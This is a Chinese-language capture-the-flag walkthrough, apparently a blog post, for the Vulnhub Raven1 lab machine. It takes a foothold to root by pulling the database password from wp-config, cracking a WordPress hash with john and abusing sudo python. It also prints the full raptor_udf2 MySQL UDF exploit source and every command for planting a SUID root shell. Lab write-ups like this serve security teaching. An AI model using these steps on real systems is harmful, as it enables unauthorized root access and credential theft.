Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri May 19 02:26:34 2023 from 192.168.54.128
michael@Raven:~$ whoami
michael
michael@Raven:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b5:8b:3b brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:feb5:8b3b/64 scope link 
       valid_lft forever preferred_lft forever
michael@Raven:~$ 

提权

既然获取到shell权限,当然是查看一下web目录下有没有敏感信息暴露啦。(这里www-data和michael用户下都可以)

michael@Raven:~$ find /var/www/html -name "*config*" 2>/dev/null
/var/www/html/wordpress/wp-content/plugins/akismet/views/config.php
/var/www/html/wordpress/wp-admin/setup-config.php
/var/www/html/wordpress/wp-config.php
/var/www/html/wordpress/wp-config-sample.php

这里我对wp-config.php比较感兴趣。cat一下,发现了数据库密码。
Vulnhub靶机渗透:Raven1(超级详细)_第6张图片

1、John+SUID+Python

这里进去看看能不能获取到关于steven的相关信息。

michael@Raven:~$ mysql -uroot -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 5689
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.00 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | [email protected] |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | [email protected]  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)

找到了steven的用户凭据,但这里需要解密,使用john解密。

# yunki @ yunki in ~/vulnhub/raven1 [15:58:40] 
$ echo '$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/' >> hash                                             

# yunki @ yunki in ~/vulnhub/raven1 [15:58:49] 
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash               
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
No password hashes left to crack (see FAQ)

# yunki @ yunki in ~/vulnhub/raven1 [15:59:05] C:1
$ john hash --show 
?:pink84

1 password hash cracked, 0 left

解密成功~ steven:pink84,这里习惯性的使用ssh登录一下,结果成功了。

michael@Raven:~$ su steven
Password: 
$ whoami
steven
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b5:8b:3b brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:feb5:8b3b/64 scope link 
       valid_lft forever preferred_lft forever

查看steven有什么权限。

$ sudo -l                
Matching Defaults entries for steven on raven:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User steven may run the following commands on raven:
    (ALL) NOPASSWD: /usr/bin/python
$ sudo /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
root@Raven:/home/steven# whoami
root
root@Raven:/home/steven# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b5:8b:3b brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:feb5:8b3b/64 scope link 
       valid_lft forever preferred_lft forever

还可以使用下面这个

$ sudo /usr/bin/python -c "import os ; os.system('/bin/bash')"
root@Raven:/home/steven# whoami
root

2、MYSQL+UDF

kali

 yunki @ yunki in ~/vulnhub/raven1 [16:50:26] 
$ searchsploit mysql udf        
-------------------------------------------------- ---------------------------------
 Exploit Title                                    |  Path
-------------------------------------------------- ---------------------------------
MySQL 4.0.17 (Linux) - User-Defined Function (UDF | linux/local/1181.c
MySQL 4.x/5.0 (Linux) - User-Defined Function (UD | linux/local/1518.c
MySQL 4.x/5.0 (Windows) - User-Defined Function C | windows/remote/3274.txt
MySQL 4/5/6 - UDF for Command Execution           | linux/local/7856.txt
-------------------------------------------------- ---------------------------------
Shellcodes: No Results

# yunki @ yunki in ~/vulnhub/raven1 [16:51:48] 
$ searchsploit mysql udf -m 1518
[!] Could not find EDB-ID #


[!] Could not find EDB-ID #


  Exploit: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)
      URL: https://www.exploit-db.com/exploits/1518
     Path: /usr/share/exploitdb/exploits/linux/local/1518.c
    Codes: N/A
 Verified: True
File Type: C source, ASCII text
Copied to: /home/yunki/vulnhub/raven1/1518.c

# yunki @ yunki in ~/vulnhub/raven1 [16:51:48] 
$ searchsploit mysql udf -m 1518
[!] Could not find EDB-ID #


[!] Could not find EDB-ID #


  Exploit: MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)
      URL: https://www.exploit-db.com/exploits/1518
     Path: /usr/share/exploitdb/exploits/linux/local/1518.c
    Codes: N/A
 Verified: True
File Type: C source, ASCII text
Copied to: /home/yunki/vulnhub/raven1/1518.c



# yunki @ yunki in ~/vulnhub/raven1 [16:51:54] 
$ cat 1518.c 
/*
 * $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
 *
 * raptor_udf2.c - dynamic library for do_system() MySQL UDF
 * Copyright (c) 2006 Marco Ivaldi <[email protected]>
 *
 * This is an helper dynamic library for local privilege escalation through
 * MySQL run with root privileges (very bad idea!), slightly modified to work
 * with newer versions of the open-source database. Tested on MySQL 4.1.14.
 *
 * See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
 *
 * Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
 * for the security vulnerabilities in the handling of User Defined Functions
 * (UDFs) reported by Stefano Di Paola <[email protected]>. For further
 * details, please refer to:
 *
 * http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
 * http://www.wisec.it/vulns.php?page=4
 * http://www.wisec.it/vulns.php?page=5
 * http://www.wisec.it/vulns.php?page=6
 *
 * "UDFs should have at least one symbol defined in addition to the xxx symbol
 * that corresponds to the main xxx() function. These auxiliary symbols
 * correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
 * xxx_add() functions". -- User Defined Functions Security Precautions
 *
 * Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 *
 * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys
 *
 */

#include 
#include 

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
        unsigned int            arg_count;      // number of arguments
        enum Item_result        *arg_type;      // pointer to item_result
        char                    **args;         // pointer to arguments
        unsigned long           *lengths;       // length of string args
        char                    *maybe_null;    // 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
        char                    maybe_null;     // 1 if func can return NULL
        unsigned int            decimals;       // for real functions
        unsigned long           max_length;     // for string functions
        char                    *ptr;           // free ptr for func data
        char                    const_item;     // 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
        if (args->arg_count != 1)
                return(0);

        system(args->args[0]);

        return(0);
}

char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
        return(0);
}

// milw0rm.com [2006-02-20]%  

将文件传到靶机上。

靶机

$ scp [email protected]:/home/yunki/vulnhub/raven1/1518.c .

利用

michael@Raven:~$ ls
1518.c
michael@Raven:~$ gcc -g -c 1518.c -fPIC
michael@Raven:~$ gcc -g shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
gcc: error: shared: No such file or directory
michael@Raven:~$ ls
1518.c  1518.o
michael@Raven:~$ gcc -g shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
gcc: error: shared: No such file or directory
michael@Raven:~$ gcc -g shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
gcc: error: shared: No such file or directory
michael@Raven:~$ gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc
michael@Raven:~$ ls
1518.c  1518.o  1518.so
michael@Raven:~$ use mysql;
-bash: use: command not found
michael@Raven:~$ mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 45
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> system clear;
mysql> show variabiles like '%secure_file_priv%';
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'variabiles like '%secure_file_priv%'' at line 1
mysql> show variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.00 sec)

mysql> show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value                  |
+---------------+------------------------+
| plugin_dir    | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
Query OK, 0 rows affected (0.00 sec)

mysql> insert into foo values(load_file('/home/michael/1518.so'));
Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.00 sec)

mysql> 
mysql> create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)

mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
+------------------------------------------------------------------+
| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
+------------------------------------------------------------------+
|                                                                0 |
+------------------------------------------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
michael@Raven:~$ /tmp/rootbash -p
rootbash-4.3# whoami
root
rootbash-4.3# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b5:8b:3b brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:feb5:8b3b/64 scope link 
       valid_lft forever preferred_lft forever
rootbash-4.3# 

获取flag

flag1

Vulnhub靶机渗透:Raven1(超级详细)_第7张图片

flag3

Vulnhub靶机渗透:Raven1(超级详细)_第8张图片

flag2 & flag4

root@Raven:/home/steven# find / -name "*flag*.txt" 2>/dev/null
/var/www/flag2.txt
/root/flag4.txt
root@Raven:/home/steven# cat /var/www/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
root@Raven:/home/steven# cat /root/flag4.txt
______                      

| ___ \                     

| |_/ /__ ___   _____ _ __  

|    // _` \ \ / / _ \ '_ \ 

| |\ \ (_| |\ V /  __/ | | |

\_| \_\__,_| \_/ \___|_| |_|

                            
flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought: 

@mccannwj / wjmccann.github.io

你可能感兴趣的:(打靶,vulnhub,渗透测试,linux,web安全,windows)